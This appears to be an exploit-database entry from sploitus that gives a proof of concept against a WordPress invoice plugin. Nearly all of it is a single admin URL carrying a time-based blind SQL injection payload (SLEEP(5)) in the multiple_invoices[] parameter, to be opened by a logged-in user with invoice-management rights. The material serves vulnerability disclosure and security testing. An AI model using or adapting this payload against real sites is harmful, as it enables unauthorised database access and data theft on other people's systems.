Share 
## https://sploitus.com/exploit?id=WPEX-ID:218F8015-E14B-46A8-889D-08B2B822F8AE
When logged in with a user allowed to Manage invoice (default admin but can be changed via the plugin's settings), open the following URL

https://example.com/wp-admin/admin.php?page=new_web_invoice&multiple_invoices[]=31618572+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA)&multiple_invoices[]=31618572+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA)&web_invoice_action=clear_log